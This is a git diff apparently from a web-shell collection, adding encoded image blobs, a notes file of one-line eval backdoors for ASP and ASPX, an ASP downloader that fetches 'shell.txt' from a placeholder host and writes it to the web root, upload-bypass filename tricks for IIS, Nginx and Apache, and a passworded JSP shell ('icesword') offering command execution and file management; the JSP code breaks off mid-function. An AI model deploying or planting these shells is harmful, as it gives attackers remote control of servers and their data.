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 a&)eN1TReS>r8aMdKJmAarq+W`-~R`N%=F*@ literal 0 HcmV?d00001 diff --git a/caidao-shell/php.jpg b/caidao-shell/php.jpg new file mode 100644 index 0000000000000000000000000000000000000000..3d4e08940b3b864fb3e574a6ac1a509bb0cbdea2 GIT binary patch literal 8039 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 WQH0ytT)FC|?C0gJ?0(z;X7nE~vZ(I> literal 0 HcmV?d00001 diff --git a/caidao-shell/说明.log b/caidao-shell/说明.log new file mode 100644 index 0000000..3dd7efb --- /dev/null +++ b/caidao-shell/说明.log @@ -0,0 +1,86 @@ + GIF89a ͼƬͷ + +[+]---------------------------------PHP---------------------------------[+] + + + + + + + + + +")?> + +');?> +// ͬĿ¼ ice.php + +[+]---------------------------------PHP---------------------------------[+] + + + +*************************************************************************** + + + +[+]---------------------------------ASP---------------------------------[+] +<%eval request("ice")%> + +<%www=REquEst("ice"):EvaL(www)%> + +<% +Dim ConKey:ConKey="ice" +Dim InValue:InValue=Request(ConKey) +eval(InValue) +%> + +<%E=request("ice") execute E%> + +<% +Set xPost = createObject("Microsoft.XMLHTTP") + xPost.Open "GET","http://www.xxx.com/shell.txt",0 'aspľıʽַ + xPost.Send() + Set sGet = createObject("ADODB.Stream") + sGet.Mode = 3 + sGet.Type = 1 + sGet.Open() + sGet.Write(xPost.responseBody) + sGet.SaveToFile "E:\WWWROOT\xxx.asp",2 + %> + + + }šԩ͐ // ANSI>Unicode : a + }ݩ͐ // ice + + + +ϴһͼƬһ仰(xxx.jpg)ϴһ.aspļȥ: + + +[+]---------------------------------ASP---------------------------------[+] + + + +*************************************************************************** + + + +[+]---------------------------------ASPX---------------------------------[+] + +<%@ Page Language="Jscript"%><%eval(Request.Item["ice"],"unsafe");%> + +<%@ Page Language="C#" ValidateRequest="false" %> +<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["ice"].Value))).CreateInstance("c",true,System.Reflection.BindingFlags.Default,null,new object[] { this },null,null);}catch{ }%> + +[+]---------------------------------ASPX---------------------------------[+] + + IIS 6.0 : x.asp/x.jpg x.asp;x.jpg ȫλᱻأԳԽһ仰ļΪ ;x.asp;x.jpg (IIS 7.5 a.aspx.a;.a.aspx.jpg..jpg ) + Nginx : x.jpg/.php x.jpg%00.php + Apache : x.php.x + xx.jpg.jsp,xx.png.jsp + + + Ϊ phpaspaspxһ仰ľĿͻˣΪ ice һ仰ļдЩӹ + + -- ̿ -- + 2012-07-21 \ No newline at end of file diff --git a/jsp/icesword.jsp b/jsp/icesword.jsp new file mode 100644 index 0000000..d724da2 --- /dev/null +++ b/jsp/icesword.jsp @@ -0,0 +1,1808 @@ +<%@ page contentType="text/html; charset=GBK" %> +<%@ page import="java.io.*"%> +<%@ page import="java.util.Map"%> +<%@ page import="java.util.HashMap"%> +<%@ page import="java.nio.charset.Charset"%> +<%@ page import="java.util.regex.*"%> +<%@ page import="java.sql.*"%> +<%! +private String _password = "icesword"; +private String _encodeType = "GB2312"; +private int _sessionOutTime = 20; +private String[] _textFileTypes = {"txt", "htm", "html", "asp", "jsp", "java", "js", "css", "c", "cpp", "sh", "pl", "cgi", "php", "conf", "xml", "xsl", "ini", "vbs", "inc"}; +private Connection _dbConnection = null; +private Statement _dbStatement = null; +private String _url = null; + +public boolean validate(String password) { + if (password.equals(_password)) { + return true; + } else { + return false; + } +} + +public String HTMLEncode(String str) { + str = str.replaceAll(" ", " "); + str = str.replaceAll("<", "<"); + str = str.replaceAll(">", ">"); + str = str.replaceAll("\r\n", "
          "); + + return str; +} + +public String Unicode2GB(String str) { + String sRet = null; + + try { + sRet = new String(str.getBytes("ISO8859_1"), _encodeType); + } catch (Exception e) { + sRet = str; + } + + return sRet; +} + +public String exeCmd(String cmd) { + Runtime runtime = Runtime.getRuntime(); + Process proc = null; + String retStr = ""; + InputStreamReader insReader = null; + char[] tmpBuffer = new char[1024]; + int nRet = 0; + + try { + proc = runtime.exec(cmd); + insReader = new InputStreamReader(proc.getInputStream(), Charset.forName("GB2312")); + + while ((nRet = insReader.read(tmpBuffer, 0, 1024)) != -1) { + retStr += new String(tmpBuffer, 0, nRet); + } + + insReader.close(); + retStr = HTMLEncode(retStr); + } catch (Exception e) { + retStr = "bad command \"" + cmd + "\""; + } finally { + return retStr; + } +} + +public String pathConvert(String path) { + String sRet = path.replace('\\', '/'); + File file = new File(path); + + if (file.getParent() != null) { + if (file.isDirectory()) { + if (! sRet.endsWith("/")) + sRet += "/"; + } + } else { + if (! sRet.endsWith("/")) + sRet += "/"; + } + + return sRet; +} + +public String strCut(String str, int len) { + String sRet; + + len -= 3; + + if (str.getBytes().length <= len) { + sRet = str; + } else { + try { + sRet = (new String(str.getBytes(), 0, len, "GBK")) + "..."; + } catch (Exception e) { + sRet = str; + } + } + + return sRet; +} + +public String listFiles(String path, String curUri) { + File[] files = null; + File curFile = null; + String sRet = null; + int n = 0; + boolean isRoot = path.equals(""); + + path = pathConvert(path); + + try { + if (isRoot) { + files = File.listRoots(); + } else { + try { + curFile = new File(path); + String[] sFiles = curFile.list(); + files = new File[sFiles.length]; + + for (n = 0; n < sFiles.length; n ++) { + files[n] = new File(path + sFiles[n]); + } + } catch (Exception e) { + sRet = "bad path \"" + path + "\""; + } + } + + if (sRet == null) { + sRet = "\n"; + sRet += "\n"; + sRet += "\n"; + sRet += " \n"; + + if (curFile != null) { + sRet += " \n"; + sRet += " \n"; + sRet += " \n"; + } + + sRet += "\n"; + + sRet += " \n"; + + for (n = 0; n < files.length; n ++) { + sRet += " \n"; + + if (! isRoot) { + sRet += " \n"; + if (files[n].isDirectory()) { + sRet += " \n"; + } else { + sRet += " \n"; + } + + sRet += " \n"; + sRet += " \n"; + } else { + sRet += " \n"; + } + + sRet += " \n"; + } + sRet += " \n"; + sRet += "
          \n"; + sRet += "  ϼĿ¼ "; + sRet += "Ŀ¼ "; + sRet += "½ļ "; + sRet += "ɾ "; + sRet += " "; + sRet += " "; + sRet += "ϴļ\n"; + sRet += " \n"; + sRet += "
          <" + strCut(files[n].getName(), 50) + ">" + strCut(files[n].getName(), 50) + "" + (files[n].isDirectory() ? "<dir>" : "") + ((! files[n].isDirectory()) && isTextFile(getExtName(files[n].getPath())) ? "<edit>" : "") + "" + files[n].length() + "" + pathConvert(files[n].getPath()) + "
          \n"; + } + } catch (SecurityException e) { + sRet = "security violation, no privilege."; + } + + return sRet; +} + +public boolean isTextFile(String extName) { + int i; + boolean bRet = false; + + if (! extName.equals("")) { + for (i = 0; i < _textFileTypes.length; i ++) { + if (extName.equals(_textFileTypes[i])) { + bRet = true; + break; + } + } + } else { + bRet = true; + } + + return bRet; +} + +public String getExtName(String fileName) { + String sRet = ""; + int nLastDotPos; + + fileName = pathConvert(fileName); + + nLastDotPos = fileName.lastIndexOf("."); + + if (nLastDotPos == -1) { + sRet = ""; + } else { + sRet = fileName.substring(nLastDotPos + 1); + } + + return sRet; +} + +public String browseFile(String path) { + String sRet = ""; + File file = null; + FileReader fileReader = null; + + path = pathConvert(path); + + try { + file = new File(path); + fileReader = new FileReader(file); + String fileString = ""; + char[] chBuffer = new char[1024]; + int ret; + + sRet = "\n"; + + } catch (IOException e) { + sRet += "\n"; + } + + return sRet; +} + +public String openFile(String path, String curUri) { + String sRet = ""; + boolean canOpen = false; + int nLastDotPos = path.lastIndexOf("."); + String extName = ""; + String fileString = null; + File curFile = null; + + path = pathConvert(path); + + if (nLastDotPos == -1) { + canOpen = true; + } else { + extName = path.substring(nLastDotPos + 1); + canOpen = isTextFile(extName); + } + + if (canOpen) { + try { + fileString = ""; + curFile = new File(path); + FileReader fileReader = new FileReader(curFile); + char[] chBuffer = new char[1024]; + int nRet; + + while ((nRet = fileReader.read(chBuffer, 0, 1024)) != -1) { + fileString += new String(chBuffer, 0, nRet); + } + + fileReader.close(); + } catch (IOException e) { + fileString = null; + sRet = "ܴļ\"" + path + "\""; + } catch (SecurityException e) { + fileString = null; + sRet = "ȫ⣬ûȨִиò"; + } + } else { + sRet = "file \"" + path + "\" is not a text file, can't be opened in text mode"; + } + + if (fileString != null) { + sRet += "\n"; + sRet += "\n"; + sRet += " \n"; + sRet += " \n"; + sRet += " \n"; + sRet += " \n"; + sRet += " \n"; + sRet += " \n"; + sRet += " \n"; + sRet += " \n"; + sRet += " \n"; + sRet += " \n"; + sRet += " \n"; + sRet += "
          [ϼĿ¼]
          \n"; + sRet += " \n"; + sRet += "
           
          \n"; + } + + return sRet; +} + +public String saveFile(String path, String curUri, String fileContent) { + String sRet = ""; + File file = null; + + path = pathConvert(path); + + try { + file = new File(path); + + if (! file.canWrite()) { + sRet = "ļд"; + } else { + FileWriter fileWriter = new FileWriter(file); + fileWriter.write(fileContent); + + fileWriter.close(); + sRet = "ļɹڷأԺ򡭡\n"; + sRet += "\n"; + } + } catch (IOException e) { + sRet = "ļʧ"; + } catch (SecurityException e) { + sRet = "ȫ⣬ûȨִиò"; + } + + return sRet; +} + +public String createFolder(String path, String curUri, String folderName) { + String sRet = ""; + File folder = null; + + path = pathConvert(path); + + try { + folder = new File(path + folderName); + + if (folder.exists() && folder.isDirectory()) { + sRet = "\"" + path + folderName + "\"Ŀ¼Ѿ"; + } else { + if (folder.mkdir()) { + sRet = "ɹĿ¼\"" + pathConvert(folder.getPath()) + "\"ڷأԺ򡭡\n"; + sRet += ""; + } else { + sRet = "Ŀ¼\"" + folderName + "\"ʧ"; + } + } + } catch (SecurityException e) { + sRet = "ȫ⣬ûȨִиò"; + } + + return sRet; +} + +public String createFile(String path, String curUri, String fileName) { + String sRet = ""; + File file = null; + + path = pathConvert(path); + + try { + file = new File(path + fileName); + + if (file.createNewFile()) { + sRet = ""; + } else { + sRet = "\"" + path + fileName + "\"ļѾ"; + } + } catch (SecurityException e) { + sRet = "ȫ⣬ûȨִиò"; + } catch (IOException e) { + sRet = "ļ\"" + path + fileName + "\"ʧ"; + } + + return sRet; +} + +public String deleteFile(String path, String curUri, String[] files2Delete) { + String sRet = ""; + File tmpFile = null; + + try { + for (int i = 0; i < files2Delete.length; i ++) { + tmpFile = new File(files2Delete[i]); + if (! tmpFile.delete()) { + sRet += "ɾ\"" + files2Delete[i] + "\"ʧ
          \n"; + } + } + + if (sRet.equals("")) { + sRet = "ɾɹڷأԺ򡭡\n"; + sRet += ""; + } + } catch (SecurityException e) { + sRet = "ȫ⣬ûȨִиò\n"; + } + + return sRet; +} + +public String saveAs(String path, String curUri, String fileContent) { + String sRet = ""; + File file = null; + FileWriter fileWriter = null; + + try { + file = new File(path); + + if (file.createNewFile()) { + fileWriter = new FileWriter(file); + fileWriter.write(fileContent); + fileWriter.close(); + + sRet = ""; + } else { + sRet = "ļ\"" + path + "\"Ѿ"; + } + } catch (IOException e) { + sRet = "ļ\"" + path + "\"ʧ"; + } + + return sRet; +} + + +public String uploadFile(ServletRequest request, String path, String curUri) { + String sRet = ""; + File file = null; + InputStream in = null; + + path = pathConvert(path); + + try { + in = request.getInputStream(); + + byte[] inBytes = new byte[request.getContentLength()]; + int nBytes; + int start = 0; + int end = 0; + int size = 1024; + String token = null; + String filePath = null; + + // + // һֽ + // + while ((nBytes = in.read(inBytes, start, size)) != -1) { + start += nBytes; + } + + 